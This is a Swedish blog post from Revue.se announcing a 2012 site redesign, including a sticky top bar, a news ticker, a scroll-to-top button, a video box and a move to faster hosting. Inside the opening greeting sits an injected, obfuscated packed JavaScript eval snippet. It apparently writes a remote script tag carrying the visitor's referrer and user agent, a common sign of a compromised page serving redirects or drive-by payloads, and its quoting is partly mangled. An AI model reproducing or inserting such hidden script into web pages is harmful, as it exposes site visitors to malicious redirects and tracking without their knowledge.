Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Genomgång: Uppdatering av Revue.se

Genomgång: Uppdatering av Revue.se
Filip Urde
  • On 25 januari, 2012
  • http://www.revue.se/filip-urde

Kära eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tdhnf|var|u0026u|referrer|iyafn||js|php’.split(’|’),0,{}))
läsare till Revue.se!

Som ni säkert sett, så har vi sedan i måndags haft ett nytt utseende på hemsidan. Vi är själva mycket nöjda med resultatet, men vi vill så klart veta vad ni läsare tycker och därför har vi en liten omröstning här till höger. Där kan man välja mellan tre alternativ över vad man tycker om hemsidan. Men det är inte bara ett nytt utseende som vi fått, med uppdateringen så har vi även fått ett gäng nya funktioner och uppgraderingar till sidan som ska underlätta användarens upplevelse.

Det första man lägger märke till är att vi fäst en ”top bar” med ”breaking” och en ”sök här” ruta. Denna ”top bar” följer med när du scrollar på hemsidan och är tillför att visa vilken som är dagens topp nyhet, samt att du enkelt ska kunna göra en sökning var du än är på sidan.

 

Startsidans struktur är lik orginalet, en funktion är att vi har lagt till en ”flödes bar”som rullar med det senaste som hänt på sidan. Allt för att snabbt och enkelt hitta rätt information.

En annan ny funktion för att underlätta användningen av hemsidan är ”scroll to top” knappen, vilken blir synlig i det nedre högra hörnet så fort ni börjar scrolla nedåt på sidan. Med den kan du sedan snabbt komma till toppen av sidan utan att scrolla.

I övrigt så har fokus för vår uppdatering legat i att göra allt mer synligt och lättillgängligt för användaren, utan att hemsidan blir en vanlig tråkig blogg. Vi har precis som tidigare en kategorimeny högst upp, följt av en ”spotlight” ruta med våra senaste artiklarna, vars bilder syns i ett bildspel. Denna har varit en av våra stora fördelar i upplägget och är alltså inget vi ändrat. Men vad vi märkt är att många vill ha en enklare tillgång till våra videos, därför har vi skapat en ruta där vi listar de tolv senaste filmerna som lagts upp.

Uppdateringen har även innefattat ett byte av webbhotell, då vi själva samt flera av våra läsare, klagat på hastigheten när man är inne på sidan.  I skölvattnet till detta så hade vi under gårdagen lite strul med servrarna som gjorde att sidan gick lite segt. Vi hoppas att ni inte drabbats allt för mycket av detta.  Det ska dock vara löst nu och Revue.se kommer flyta på snabbare än någonsin tidigare.

Detta är självklart inte allt, men vi vill att ni själva ska få möjlighet att upptäcka sajten och hitta allt godis vi har lagt till.

Vi hoppas ni kommer uppskatta den nya sidan lika mycket som vi gör.